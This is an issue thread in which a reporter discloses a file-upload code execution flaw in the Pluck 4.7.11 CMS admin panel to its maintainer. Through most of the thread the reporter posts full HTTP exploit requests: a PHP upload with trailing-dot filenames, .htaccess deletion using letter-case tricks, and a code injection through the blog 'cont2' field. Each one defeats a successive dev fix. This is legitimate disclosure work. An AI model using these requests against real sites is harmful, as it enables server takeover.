Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files

Question

Pluck-4.7.11 admin background exists a remote command execution vulnerability when uploading files

wooyin opened this issue 5 years ago · comments

Wooyin commented 5 years ago

Proof
step1: login -> pages -> manage files
upload .htaccess file to turn files/.htaccess to .htaccess.txt

step2: throw .htaccess.txt into trash

step3: upload shell code

POST /pluck4711/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 339
Connection: close
Referer: http://127.0.0.1/pluck4711/admin.php?action=files
Cookie: PHPSESSID=50oi7cqaj4hrmj6pqiufa57lij
Upgrade-Insecure-Requests: 1

-----------------------------18467633426500
Content-Disposition: form-data; name="filefile"; filename="pass07.php......"
Content-Type: application/octet-stream

<?php echo phpinfo();?>
-----------------------------18467633426500
Content-Disposition: form-data; name="submit"

Upload
-----------------------------18467633426500--

step4: view http://127.0.0.1/pluck4711/files/pass07.php

Bas Steelooper · Answer 1 · Thu Dec 19 2019 23:58:19 GMT+0800 (China Standard Time)

Thanks... good find... Missed this in the testing. .htaccess will now be ignored when uploaded.

Bas Steelooper · Answer 2 · Fri Dec 20 2019 00:00:06 GMT+0800 (China Standard Time)

Could you try the https://github.com/pluck-cms/pluck/tree/4.7.12-dev1 release?

Wooyin · Answer 3 · Fri Dec 20 2019 00:26:31 GMT+0800 (China Standard Time)

can bypass like this

GET /pluck-4.7.12-dev1/admin.php?action=deletefile&var1=.htaccess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1

Wooyin · Answer 4 · Fri Dec 20 2019 00:34:51 GMT+0800 (China Standard Time)

And this way

POST /pluck-4.7.12-dev1/admin.php?action=files HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 346
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev1/admin.php?action=files
Cookie: PHPSESSID=57e7d8gah1oa5b6vomb6dnel35
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="filefile"; filename=".htaccess..........."
Content-Type: application/octet-stream


-----------------------------293582696224464
Content-Disposition: form-data; name="submit"

Upload
-----------------------------293582696224464--

Bas Steelooper · Answer 5 · Fri Dec 20 2019 00:39:57 GMT+0800 (China Standard Time)

How does this last one work? the ..... is not omitted so it is not picked up by apache?

Bas Steelooper · Answer 6 · Fri Dec 20 2019 00:47:53 GMT+0800 (China Standard Time)

could you do a retest with version https://github.com/pluck-cms/pluck/tree/4.7.12-dev2

Wooyin · Answer 7 · Fri Dec 20 2019 09:11:50 GMT+0800 (China Standard Time)

use strtolower()

GET /pluck-4.7.12-dev2/admin.php?action=deletefile&var1=.htACcess HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?action=files
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

Wooyin · Answer 8 · Fri Dec 20 2019 09:40:45 GMT+0800 (China Standard Time)

And you should solve this too.

cont2 is vulnable

POST /pluck-4.7.12-dev2/admin.php?module=blog&page=newpost HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Connection: close
Referer: http://127.0.0.1/pluck-4.7.12-dev2/admin.php?module=blog&page=newpost
Cookie: PHPSESSID=mmhe135g2qbk80543g5f6bjksg
Upgrade-Insecure-Requests: 1

cont1=11111&cont2=2';phpinfo();/*&cont3=22222&save_exit=Save+and+Exit

Wooyin · Answer 9 · Fri Dec 20 2019 15:07:06 GMT+0800 (China Standard Time)

I test on Windows, the system will delete points automatically

Bas Steelooper · Answer 10 · Mon Dec 23 2019 03:14:44 GMT+0800 (China Standard Time)

Ok.. I’ll try to find a solution for the windows mishaps